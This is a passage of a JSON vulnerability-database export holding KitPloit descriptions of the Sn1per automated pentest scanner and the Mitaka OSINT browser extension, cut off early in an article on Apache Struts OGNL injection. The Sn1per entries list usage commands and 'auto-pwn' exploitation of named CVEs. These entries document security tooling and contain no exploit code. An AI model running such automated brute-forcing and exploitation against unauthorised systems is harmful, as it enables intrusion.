\n**DEMO VIDEO:** \n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * * Automatically collects basic recon (ie. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically test for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically test for anonymous LDAP access\n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerate SNMP community strings, services and users\n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067\n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Create individual workspaces to store all scan output\n \n**AUTO-PWN:** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600\n * GPON Router RCE CVE-2018-10561\n * [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638\n * Apache Struts 2 RCE CVE-2017-9805\n * Apache Jakarta RCE CVE-2017-5638\n * Shellshock GNU Bash RCE CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * Default Apache Tomcat Creds CVE-2009-3843\n * MS Windows SMB RCE MS08-067\n * Webmin File Disclosure CVE-2006-3392\n * [Anonymous FTP](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access\n * PHPMyAdmin Backdoor RCE\n * PHPMyAdmin Auth Bypass\n * JBoss Java De-Serialization RCE's\n \n**KALI LINUX INSTALL:** \n\n \n \n ./install.sh\n\n \n**DOCKER INSTALL:** \nCredits: @menzow \nDocker Install: <https://github.com/menzow/sn1per-docker> \nDocker Build: <https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/> \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **UPDATE:** Checks for updates and upgrades all components used by sniper.\n * **REIMPORT:** Reimport all workspace files into Metasploit and reproduce all reports.\n * **RELOAD:** Reload the master workspace report.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per v5.0](<https://github.com/1N3/Sn1per>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-07-05T13:45:00", "type": "kitploit", "title": "Sn1per v5.0 - Automated Pentest Recon Scanner", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2017-5638", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-7600"], "modified": "2018-07-05T13:45:01", "id": "KITPLOIT:7835941952769002973", "href": "http://www.kitploit.com/2018/07/sn1per-v50-automated-pentest-recon.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T15:17:53", "description": "[](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n**Categorized host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Personalized notes field for each host** \n \n\n\n[](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n**DEMO VIDEO:** \n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * * Automatically collects basic recon (ie. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically test for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically test for anonymous LDAP access\n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerate SNMP community strings, services and users\n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067\n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Create individual workspaces to store all scan output\n \n**AUTO-PWN:** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600\n * GPON Router RCE CVE-2018-10561\n * [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638\n * Apache Struts 2 RCE CVE-2017-9805\n * Apache Jakarta RCE CVE-2017-5638\n * Shellshock GNU Bash RCE CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * Default Apache Tomcat Creds CVE-2009-3843\n * MS Windows SMB RCE MS08-067\n * Webmin File Disclosure CVE-2006-3392\n * [Anonymous FTP](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access\n * PHPMyAdmin Backdoor RCE\n * PHPMyAdmin Auth Bypass\n * JBoss Java De-Serialization RCE's\n \n**KALI LINUX INSTALL:** \n\n \n \n ./install.sh\n\n \n**DOCKER INSTALL:** \nCredits: @menzow \nDocker Install: <https://github.com/menzow/sn1per-docker> \nDocker Build: <https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/> \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **UPDATE:** Checks for updates and upgrades all components used by sniper.\n * **REIMPORT:** Reimport all workspace files into Metasploit and reproduce all reports.\n * **RELOAD:** Reload the master workspace report.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per v5.0](<https://github.com/1N3/Sn1per>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-11-24T12:43:00", "type": "kitploit", "title": "Sn1per v6.0 - Automated Pentest Framework For Offensive Security Experts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2017-5638", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-7600"], "modified": "2018-11-24T12:43:00", "id": "KITPLOIT:8672599587089685905", "href": "http://www.kitploit.com/2018/11/sn1per-v60-automated-pentest-framework.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-19T15:27:47", "description": "[](<https://1.bp.blogspot.com/-9cslz9huO_U/XYAeBJbmtNI/AAAAAAAAQXo/vfBLw3xqV-stKkRe0MzCd4fOhcbHSMVCwCNcBGAsYHQ/s1600/mitaka_8_eyecatch.png>)\n\n \nMitaka is a browser extension for [OSINT](<https://www.kitploit.com/search/label/OSINT> \"OSINT\" ) search which can: \n\n\n * Extract & refang IoC from a selected block of text. \n * E.g. `example[.]com` to `example.com`, `test[at]example.com` to `some-email@example.com`, `hxxp://example.com` to `http://example.com`, etc.\n * Search / scan it on various engines. \n * E.g. VirusTotal, urlscan.io, Censys, Shodan, etc.\n \n**Features** \n \n**Supported IOC types** \nname | desc. | e.g. \n---|---|--- \ntext | Freetext | any string(s) \nip | IPv4 address | `8.8.8.8` \ndomain | Domain name | `github.com` \nurl | URL | `https://github.com` \nemail | Email address | `some-email@example.com` \nasn | ASN | `AS13335` \nhash | md5 / sha1 / sha256 | `44d88612fea8a8f36de82e1278abb02f` \ncve | CVE number | `CVE-2018-11776` \nbtc | BTC address | `1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa` \ngaPubID | Google Adsense Publisher ID | `pub-9383614236930773` \ngaTrackID | Google [Analytics](<https://www.kitploit.com/search/label/Analytics> \"Analytics\" ) Tracker ID | `UA-67609351-1` \n \n**Supported search engines** \nname | url | supported types \n---|---|--- \nAbuseIPDB | [https://www.abuseipdb.com](<https://www.abuseipdb.com/> \"https://www.abuseipdb.com\" ) | ip \narchive.org | [https://archive.org](<https://archive.org/> \"https://archive.org\" ) | url \narchive.today | [http://archive.fo](<http://archive.fo/> \"http://archive.fo\" ) | url \nBGPView | [https://bgpview.io](<https://bgpview.io/> \"https://bgpview.io\" ) | ip / asn \nBinaryEdge | [https://app.binaryedge.io](<https://app.binaryedge.io/> \"https://app.binaryedge.io\" ) | ip / domain \nBitcoinAbuse | [https://www.bitcoinabuse.com](<https://www.bitcoinabuse.com/> \"https://www.bitcoinabuse.com\" ) | btc \nBlockchain.com | [https://www.blockchain.com](<https://www.blockchain.com/> \"https://www.blockchain.com\" ) | btc \nBlockCypher | [https://live.blockcypher.com](<https://live.blockcypher.com/> \"https://live.blockcypher.com\" ) | btc \nCensys | [https://censys.io](<https://censys.io/> \"https://censys.io\" ) | ip / domain / asn / text \ncrt.sh | [https://crt.sh](<https://crt.sh/> \"https://crt.sh\" ) | domain \nDNSlytics | [https://dnslytics.com](<https://dnslytics.com/> \"https://dnslytics.com\" ) | ip / domain \nDomainBigData | [https://domainbigdata.com](<https://domainbigdata.com/> \"https://domainbigdata.com\" ) | domain \nDomainTools | [https://www.domaintools.com](<https://www.domaintools.com/> \"https://www.domaintools.com\" ) | ip / domain \nDomainWatch | [https://domainwat.ch](<https://domainwat.ch/> \"https://domainwat.ch\" ) | domain / email \nEmailRep | [https://emailrep.io](<https://emailrep.io/> \"https://emailrep.io\" ) | email \nFindSubDomains | [https://findsubdomains.com](<https://findsubdomains.com/> \"https://findsubdomains.com\" ) | domain \nFOFA | [https://fofa.so](<https://fofa.so/> \"https://fofa.so\" ) | ip / domain \nFortiGuard | [https://fortiguard.com](<https://fortiguard.com/> \"https://fortiguard.com\" ) | ip / url / cve \nGoogle Safe Browsing | [https://transparencyreport.google.com](<https://transparencyreport.google.com/> \"https://transparencyreport.google.com\" ) | domain / url \nGreyNoise | [https://viz.greynoise.io](<https://viz.greynoise.io/> \"https://viz.greynoise.io\" ) | ip / domain / asn \nHashdd | [https://hashdd.com](<https://hashdd.com/> \"https://hashdd.com\" ) | ip / domain / hash \nHybridAnalysis | [https://www.hybrid-analysis.com](<https://www.hybrid-analysis.com/> \"https://www.hybrid-analysis.com\" ) | ip / domain / hash (sha256 only) \nIntelligence X | [https://intelx.io](<https://intelx.io/> \"https://intelx.io\" ) | ip / domain / url / email / btc \nIPinfo | [https://ipinfo.io](<https://ipinfo.io/> \"https://ipinfo.io\" ) | ip / asn \nIPIP | [https://en.ipip.net](<https://en.ipip.net/> \"https://en.ipip.net\" ) | ip / asn \nJoe Sandbox | [https://www.joesandbox.com](<https://www.joesandbox.com/> \"https://www.joesandbox.com\" ) | hash \nMalShare | [https://malshare.com](<https://malshare.com/> \"https://malshare.com\" ) | hash \nMaltiverse | [https://www.maltiverse.com](<https://www.maltiverse.com/> \"https://www.maltiverse.com\" ) | domain / hash \nNVD | [https://nvd.nist.gov](<https://nvd.nist.gov/> \"https://nvd.nist.gov\" ) | cve \nOOCPR | [https://data.occrp.org](<https://data.occrp.org/> \"https://data.occrp.org\" ) | email \nONYPHE | [https://www.onyphe.io](<https://www.onyphe.io/> \"https://www.onyphe.io\" ) | ip \nOTX | [https://otx.alienvault.com](<https://otx.alienvault.com/> \"https://otx.alienvault.com\" ) | ip / domain / hash \nPubDB | [http://pub-db.com](<http://pub-db.com/> \"http://pub-db.com\" ) | gaPubID / gaTrackID \nPublicWWW | [https://publicwww.com](<https://publicwww.com/> \"https://publicwww.com\" ) | text \nPulsedive | [https://pulsedive.com](<https://pulsedive.com/> \"https://pulsedive.com\" ) | ip / domaion / url / hash \nRiskIQ | [http://community.riskiq.com](<http://community.riskiq.com/> \"http://community.riskiq.com\" ) | ip / domain / email / gaTrackID \nSecurityTrails | [https://securitytrails.com](<https://securitytrails.com/> \"https://securitytrails.com\" ) | ip / domain / email \nShodan | [https://www.shodan.io](<https://www.shodan.io/> \"https://www.shodan.io\" ) | ip / domain / asn \nSploitus | [https://sploitus.com](<https://sploitus.com/> \"https://sploitus.com\" ) | cve \nSpyOnWeb | [http://spyonweb.com](<http://spyonweb.com/> \"http://spyonweb.com\" ) | ip / domain / gaPubID / gaTrackID \nTalos | [https://talosintelligence.com](<https://talosintelligence.com/> \"https://talosintelligence.com\" ) | ip / domain \nThreatConnect | [https://app.threatconnect.com](<https://app.threatconnect.com/> \"https://app.threatconnect.com\" ) | ip / domain / email \nThreatCrowd | [https://www.threatcrowd.org](<https://www.threatcrowd.org/> \"https://www.threatcrowd.org\" ) | ip / domain / email \nThreatMiner | [https://www.threatminer.org](<https://www.threatminer.org/> \"https://www.threatminer.org\" ) | ip / domain / hash \nTIP | [https://threatintelligenceplatform.com](<https://threatintelligenceplatform.com/> \"https://threatintelligenceplatform.com\" ) | ip / domain \nUrlscan | [https://urlscan.io](<https://urlscan.io/> \"https://urlscan.io\" ) | ip / domain / asn / url \nViewDNS | [https://viewdns.info](<https://viewdns.info/> \"https://viewdns.info\" ) | ip / domain / email \nVirusTotal | [https://www.virustotal.com](<https://www.virustotal.com/> \"https://www.virustotal.com\" ) | ip / domain / url / hash \nVulmon | [https://vulmon.com](<https://vulmon.com/> \"https://vulmon.com\" ) | cve \nVulncodeDB | [https://www.vulncode-db.com](<https://www.vulncode-db.com/> \"https://www.vulncode-db.com\" ) | cve \nVxCube | [http://vxcube.com](<http://vxcube.com/> \"http://vxcube.com\" ) | ip / domain / hash \nWebAnalyzer | [https://wa-com.com](<https://wa-com.com/> \"https://wa-com.com\" ) | domain \nWe Leak Info | [https://weleakinfo.com](<https://weleakinfo.com/> \"https://weleakinfo.com\" ) | email \nX-Force Exchange | [https://exchange.xforce.ibmcloud.com](<https://exchange.xforce.ibmcloud.com/> \"https://exchange.xforce.ibmcloud.com\" ) | ip / domain / hash \nZoomEye | [https://www.zoomeye.org](<https://www.zoomeye.org/> \"https://www.zoomeye.org\" ) | ip \n \n**Supported scan engines** \nname | url | supported types \n---|---|--- \nUrlscan | [https://urlscan.io](<https://urlscan.io/> \"https://urlscan.io\" ) | ip / domain / url \nVirusTotal | [https://www.virustotal.com](<https://www.virustotal.com/> \"https://www.virustotal.com\" ) | url \n \n**Downloads** \n\n\n * Chrome: <https://chrome.google.com/webstore/detail/mitaka/bfjbejmeoibbdpfdbmbacmefcbannnbg>\n * FireFox: <https://addons.mozilla.org/en-US/firefox/addon/mitaka/>\n \n**How to use** \nThis browser extension shows context menus based on a type of IoC you selected and then you can choose what you want to search / scan on. \n \n**Examples:** \n \n\n\n[](<https://1.bp.blogspot.com/-2tdM6fuXGfQ/XYAeOc1TdNI/AAAAAAAAQXs/o9Yh-_pJEdwOcF-5KM-3Hj9CjQSlHLl5wCNcBGAsYHQ/s1600/mitaka_9_1.gif>)\n\n \n\n\n[](<https://1.bp.blogspot.com/-4t9b6shG_iQ/XYAeOVytJkI/AAAAAAAAQXw/b4P4PJz5gU0lDqmKpJ9dL3jhiUVXkhOxwCNcBGAsYHQ/s1600/mitaka_10_2.gif>)\n\n \n**Note:** \nPlease set your urlscan.io & [VirusTotal](<https://www.kitploit.com/search/label/VirusTotal> \"VirusTotal\" ) API keys in the options page for enabling urlscan.io & VirusTotal scans. \n \n**Options** \nYou can enable / disable a search engine on the options page based on your preference. \n \n\n\n[](<https://1.bp.blogspot.com/-dP_LGUSsF1M/XYAeT14bPsI/AAAAAAAAQX0/U7gyifaFxOgCv92e0_k0fugVzaLMShGIACNcBGAsYHQ/s1600/mitaka_11_options.png>)\n\n \n**About Permissons** \nThis browser extension requires the following permissions. \n\n\n * `Read and change all your data on the websites you visit`: \n * This extension creates context menus dynamically based on what you select on a website.\n * It means this extension requires reading all your data on the websites you visit. (This extension doesn't change anything on the websites)\n * `Display notifications`: \n * This extension makes a notification when something goes wrong.\nI don't (and will never) collect any information from the users. \n \n**Alternatives or Similar Tools** \n\n\n * [CrowdScrape](<https://chrome.google.com/webstore/detail/crowdscrape/jjplaeklnlddpkbbdbnogmppffokemej> \"CrowdScrape\" )\n * [Gotanda](<https://github.com/HASH1da1/Gotanda> \"Gotanda\" )\n * [Sputnik](<https://github.com/mitchmoser/sputnik> \"Sputnik\" )\n * [ThreatConnect Integrated ](<https://chrome.google.com/webstore/detail/threatconnect-integrated/lblgcphpihpadjdpjgjnnoikjdjcnkbh> \"ThreatConnect Integrated \" )[Chrome](<https://www.kitploit.com/search/label/Chrome> \"Chrome\" ) Extension\n * [ThreatPinch Lookup](<https://github.com/cloudtracer/ThreatPinchLookup> \"ThreatPinch Lookup\" )\n * [VTchromizer](<https://chrome.google.com/webstore/detail/vtchromizer/efbjojhplkelaegfbieplglfidafgoka> \"VTchromizer\" )\n \n**How to build (for developers)** \nThis browser extension is written in [TypeScript](<https://www.typescriptlang.org/> \"TypeScript\" ) and built by [webpack](<https://webpack.js.org/> \"webpack\" ). \nTypeScript files will start out in `src` directory, run through the TypeScript compiler, then webpack, and end up in JavaScript files in `dist` directory. \n\n \n \n git clone https://github.com/ninoseki/mitaka.git\n cd mitaka\n npm install\n npm run test\n npm run build\n\nFor loading an unpacked extension, please follow the procedures described at <https://developer.chrome.com/extensions/getstarted>. \n \n**Misc** \nMitaka/\u898b\u305f\u304b means \"Have you seen it?\" in Japanese. \n \n \n\n\n**[Download Mitaka](<https://github.com/ninoseki/mitaka> \"Download Mitaka\" )**\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-21T12:00:00", "type": "kitploit", "title": "Mitaka - A Browser Extension For OSINT Search", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2019-09-21T12:00:07", "id": "KITPLOIT:8708017483803645203", "href": "http://www.kitploit.com/2019/09/mitaka-browser-extension-for-osint.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2019-03-30T00:37:24", "description": "Through this article, we mainly learn how Apache Struts to achieve OGNL injection. Our examples will be set forth in the Struts of the two critical vulnerabilities: CVE-2017-5638\uff08Equifax information disclosure and CVE-2018-11776\u3002 \nApache Struts is a free open source framework for creating modern Java Web applications. Apache Struts has many serious vulnerabilities, one of its characteristics is to support OGNL object graph navigation language, which is also many loopholes is the main reason. \nOne vulnerability, CVE-2017-5638 directly leads to the 2017 Equifax information leakage, exposure to more than 1. 45 million US citizens personal information. Although the company's annual revenue more than 30 billion dollars, but they still did not escape the Apache Struts MVC framework of a known vulnerability attack. \nThis paper mainly introduces the Apache Struts, and then will guide us 